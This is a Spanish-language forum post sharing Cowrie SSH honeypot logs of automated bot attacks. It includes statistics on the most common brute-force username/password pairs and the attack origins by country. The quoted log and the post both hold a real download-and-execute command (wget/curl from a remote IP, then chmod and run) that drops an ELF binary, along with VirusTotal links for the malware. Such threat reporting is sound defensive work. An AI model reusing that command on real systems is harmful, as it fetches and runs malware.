Logs interesantes Honeypot SSH (Cowrie)

Iniciado por el-brujo, 17 Febrero 2021, 16:07 PM

0 Miembros y 1 Visitante están viendo este tema.

el-brujo

Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.

Pero en log que pongo pues una ip China:
IP China
https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

Se bajó un binario llamado 80

CitarPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

binario 80 ELF
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 comandos más utilizados:



En otra máquina resulados bastante diferentes:



Adjunto el log

Citar2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales

Citar############
Top 20 COWRIE Usernames for 2021-02-11
############
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'



En otra ip resultados no exactamente iguales:


Y algunos gráficos completos (país, etc)

Citar1- Irlanda
2- Rusia
3- Panamá

688 ip's diferentes en apenas 9 horas